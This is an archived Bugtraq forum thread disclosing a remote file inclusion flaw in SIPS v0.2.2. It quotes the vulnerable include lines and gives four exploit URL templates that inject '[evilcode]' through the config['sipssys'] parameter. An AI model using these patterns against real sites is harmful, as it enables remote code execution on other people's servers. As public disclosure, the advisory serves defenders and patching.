Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
SIPS v0.2.2 Remote File Inclusion Vulnerability
Jun 30 2009 03:20PM
Cru3l.b0y (cru3l b0y gmail com)
(2 replies)
Hi Dear,
Please publish this bug.
Thank you
/=======================================================================
========================================================================
| |
| [o] SIPS v0.2.2 Remote File Inclusion Vulnerability |
| |
| Software : SIPS v0.2.2 |
| Vendor : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip |
| Author : Cru3l.b0y | |
| Home : WwW.DeltaHacking.Net
|=======================================================================
========================================================================
|
| |
| [o] Vulnerable file |
| |
| search.php |
| |
| include $config["sipssys"] ."/code/news.inc.php"; |
| |
| readmore.php |
| |
| include $config["sipssys"] ."/code/news.inc.php"; |
| |
| index.php |
| |
| include $config["sipssys"] ."/code/news.inc.php"; |
| include $config["sipssys"] ."/code/box.inc.php"; |
| |
| search/submit.php |
| |
| include $config["sipssys"] ."/code/search.inc.php"; |
| |
| |
| |
| [o] Exploit |
| |
| http://localhost/[path]/search.php?config["sipssys"]=[evilcode] |
| http://localhost/[path]/readmore.php?config["sipssys"]=[evilcode] |
| http://localhost/[path]/index.php?config["sipssys"]=[evilcode] |
| http://localhost/[path]/search/submit.php?config["sipssys"]=[evilcode] |
| |
[ reply ]
Re: SIPS v0.2.2 Remote File Inclusion Vulnerability
Jun 30 2009 07:38PM
Joe (joe avvanta com)
Re: SIPS v0.2.2 Remote File Inclusion Vulnerability
Jun 30 2009 06:29PM
Vladimir '3APA3A' Dubrovin (3APA3A SECURITY NNOV RU)
Privacy Statement
Copyright 2009, SecurityFocus
Please publish this bug.
Thank you
/=======================================================================
========================================================================
| |
| [o] SIPS v0.2.2 Remote File Inclusion Vulnerability |
| |
| Software : SIPS v0.2.2 |
| Vendor : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip |
| Author : Cru3l.b0y | |
| Home : WwW.DeltaHacking.Net
|=======================================================================
========================================================================
|
| |
| [o] Vulnerable file |
| |
| search.php |
| |
| include $config["sipssys"] ."/code/news.inc.php"; |
| |
| readmore.php |
| |
| include $config["sipssys"] ."/code/news.inc.php"; |
| |
| index.php |
| |
| include $config["sipssys"] ."/code/news.inc.php"; |
| include $config["sipssys"] ."/code/box.inc.php"; |
| |
| search/submit.php |
| |
| include $config["sipssys"] ."/code/search.inc.php"; |
| |
| |
| |
| [o] Exploit |
| |
| http://localhost/[path]/search.php?config["sipssys"]=[evilcode] |
| http://localhost/[path]/readmore.php?config["sipssys"]=[evilcode] |
| http://localhost/[path]/index.php?config["sipssys"]=[evilcode] |
| http://localhost/[path]/search/submit.php?config["sipssys"]=[evilcode] |
| |
[ reply ]